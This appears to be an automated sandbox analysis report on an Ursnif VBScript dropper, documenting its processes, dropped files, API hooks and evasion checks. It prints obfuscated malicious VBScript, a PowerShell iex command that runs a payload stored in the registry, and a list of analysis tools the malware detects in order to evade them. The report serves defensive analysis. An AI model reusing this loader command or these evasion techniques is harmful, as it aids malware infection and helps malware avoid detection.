Anti Malware Scan Interface: WScript.ScriptName, cStr(588331044)) > 0 And science = 0) ThenExit FunctionEnd IfToshiba = 15' omicron Burundi ago geology patriot, much disgustful starlight Scottish. roe truculent. Muskegon amphetamine ergative worship defraud jumble, 562810 fixate. 6171009 canonic. affiance Hartman modal referral Dominick coxcomb. Anthony shadbush taskmaster business Israeli ethic fame pretentious Nabisco McNaughton Loomis brusque Samson hackle appeasable cachalot aerobic Shelton two planetoid, intestinal glyph dilatory largesse Nicholson sportsman Ann chap if (Toshiba > ((((19 + 48.0) + 60.0) - 87.0) - 30.0)) Thenfathom = Array(203)' matrices tackle incommensurable caustic extrapolate tingle gluey dominant journeymen excavate condominium oratoric incumbent befitting songful aspersion fourteen Kenney painful clue. logging Wilcox upsetting exponentiate sixth repression Veneto buckwheat officialdom, reprisal NAACP carboxy plagiarist alkali Susan testamentary tentative Dim Sydney:Set Sydney = CreateObject("WScript.Shell")BsmOi = Sydney.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")' bleed Shea legerdemain carriage427. 8172464 swill, eluate meetinghouse Leyden obvious holmium intercom million switchman threonine Nestor Bini sham520 NTIS rivulet girth candlelight Elliott balm waxwing, Marin laxative joyous extemporaneous insensible rustle Keenan hallucinogen For Each wmQWNkY In fathomIf (wmQWNkY = Cint(BsmOi)) ThenuCNNadj("none")liltXqidNdWScript.Quit' projectile. 8079653 admiral432 brush pine ourselves, 6697046 site mumble colorimeter method receptive boa whitewash hurricane, 3279266 Gillette transgressor prehensile eugenic infatuate nebula Fruehauf turnpike Paula declaratory cutlass licensor punctual wapiti panama, sketchbook phenomenology omitted husbandry, 780563 isotropy. Styx rain sweep truck alpaca, euphoric incriminate, NYC, perpetuate gentlewomen plenum, Cominform question Jesse befog plunge mournful End IfNextREM Somers figurine sense CPA Geneva technology Jerome Dudley condemnate Elmer pence hydrosphere puppeteer obstetrician afield, Lottie rouge simplicity regulatory sportsman77 Triceratops operon herpetology reckon hunt Barbara pushout hewn handmaiden jogging Kirby urea mutter liquefaction dater Bendix gaffe gorge tenfold splurge End ifEnd FunctionFunction quizzes()on error resume nextIf (InStr(WScript.ScriptName, cStr(588331044)) > 0 And science = 0) ThenExit Function' farewell repellent, 9847806 bobby Austria cognitive adult Schwartz riparian cosmos open351 vex scamp pragmatist rehearsal theyve. exfoliate waylaid, 4552276 communicable683 Charles celesta. 1386778 nectar Watertown waylaid974 Vishnu Kuhn vamp councilwomen orthicon Hoffman. 743543 mange Nassau lineprinter moisten exception141 easternmost quit3. Hollister inductee. cotangent chuck froth alone denude, 2171109 brute Omaha. ferromagnet, 855843 controller, connivance679 Ralston emitting neophyte headache422 Michaelangelo tamp prosecute pause anion, 7937071 t

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))			Jump to behavior

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.cmdline'	Jump to behavior

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\onerous.tar	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\onerous.tar

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.278825876.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.414378391.0000000005CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278880644.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278943853.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.290307818.00000000058EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.656715294.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.278998864.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279058924.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279111543.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279035350.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.279086537.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.348938504.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5500, type: MEMORY

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\jesotz0an7tn.vbs

Jump to behavior

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.242697464.00000266CF60D000.00000004.00000001.sdmp	Binary or memory string: AP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.238332994.00000266CF6C5000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

WScript reads language and country specific registry keys (likely country aware script)

Show sources

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation	Jump to behavior

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3214			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4552			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onerous.tar	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.dll	Jump to dropped file

